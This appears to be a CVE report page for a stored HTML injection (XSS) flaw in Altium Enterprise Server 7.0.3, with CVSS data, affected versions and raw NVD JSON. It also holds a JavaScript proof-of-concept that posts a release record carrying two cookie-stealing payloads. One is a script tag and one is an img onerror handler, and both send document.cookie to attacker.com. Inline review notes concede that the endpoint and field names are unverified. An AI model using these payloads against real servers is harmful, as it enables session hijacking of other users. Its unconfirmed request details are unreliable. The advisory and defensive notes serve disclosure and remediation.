Security Vulnerability Report
CVE-2025-27380 CVSS 7.6 HIGH

CVE-2025-27380

Published: 2026-01-22 02:15:51
Last Modified: 2026-02-26 21:23:01
Source: 4760f414-e1ae-4ff1-bdad-c7a9c3538b79

Description

HTML injection in Project Release in Altium Enterprise Server (AES) 7.0.3 on all platforms allows an authenticated attacker to execute arbitrary JavaScript in the victim’s browser via crafted HTML content.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:altium:on-prem_enterprise_server:*:*:*:*:*:*:*:* - VULNERABLE (versions from 7.0.3 up to, but excluding, 7.0.6, per the configuration data in the raw JSON below)
Altium Enterprise Server (AES) 7.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-27380 HTML Injection PoC
// Target: Altium Enterprise Server (AES) 7.0.3
// Type: Stored XSS via Project Release (CWE-79 per the report above)
//
// NOTE(review): the endpoint path, JSON field names, session-cookie name and
// Authorization header used below are not confirmed by the vendor advisory
// referenced on this page; treat them as illustrative rather than verified
// request details. [TARGET_HOST], [AUTH_TOKEN] and TARGET_PROJECT_ID are
// placeholders, as is the ATTACKER_COOKIE value.
//
// Defensive reading: the weakness is that user-supplied release text
// (presumably the releaseNotes / description fields, as this script assumes)
// is rendered into the victim's page as HTML rather than being encoded for
// the HTML context. Server-side output encoding of those fields (or a strict
// sanitizer allow-list) is the fix; a Content-Security-Policy that forbids
// inline script limits impact. For detection, HTML tags or event-handler
// attributes stored in release fields are the indicator to alert on.
//
// Runtime notes: this is CommonJS (`require`) and depends on the third-party
// `node-fetch` package; it is not runnable as an ES module as written.
const fetch = require('node-fetch');
const TARGET_URL = 'https://[TARGET_HOST]/api/ProjectRelease';
const ATTACKER_COOKIE = 'session_cookie_here';

/**
 * Submits one Project Release record whose free-text fields carry HTML.
 * Authentication is supplied via the hard-coded cookie and bearer token
 * headers (the page describes the attacker as authenticated, PR:L).
 * Logs the HTTP status; rejected requests are reported only via the
 * catch block, not via the status check.
 */
async function exploit() {
  // Release payload whose free-text fields contain HTML/script content.
  const maliciousPayload = {
    projectId: 'TARGET_PROJECT_ID',
    releaseNotes: '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>',
    version: '1.0.0',
    description: '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">'
  };

  try {
    const response = await fetch(TARGET_URL, {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        'Cookie': `ASP.NET_SessionId=${ATTACKER_COOKIE}`,
        'Authorization': 'Bearer [AUTH_TOKEN]'
      },
      body: JSON.stringify(maliciousPayload)
    });
    console.log('Payload sent. Status:', response.status);
    // NOTE(review): printed unconditionally; response.status is never
    // checked, so a 4xx/5xx rejection still produces this message.
    console.log('XSS will execute when victim views the release page.');
  } catch (error) {
    // Only network/transport failures reach here (fetch does not throw on
    // HTTP error statuses).
    console.error('Exploitation failed:', error.message);
  }
}

exploit();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-27380", "sourceIdentifier": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "published": "2026-01-22T02:15:51.310", "lastModified": "2026-02-26T21:23:01.390", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTML injection in Project Release in Altium Enterprise Server (AES) 7.0.3 on all platforms allows an authenticated attacker to execute arbitrary JavaScript in the victim’s browser via crafted HTML content."}, {"lang": "es", "value": "Inyección HTML en la Versión del Proyecto en Altium Enterprise Server (AES) 7.0.3 en todas las plataformas permite a un atacante autenticado ejecutar JavaScript arbitrario en el navegador de la víctima a través de contenido HTML manipulado."}], "metrics": {"cvssMetricV31": [{"source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:altium:on-prem_enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.3", "versionEndExcluding": "7.0.6", "matchCriteriaId": "3F31D6A7-989F-4647-AA13-38737112E369"}]}]}], "references": [{"url": "https://www.altium.com/platform/security-compliance/security-advisories", "source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "tags": ["Vendor Advisory"]}]}}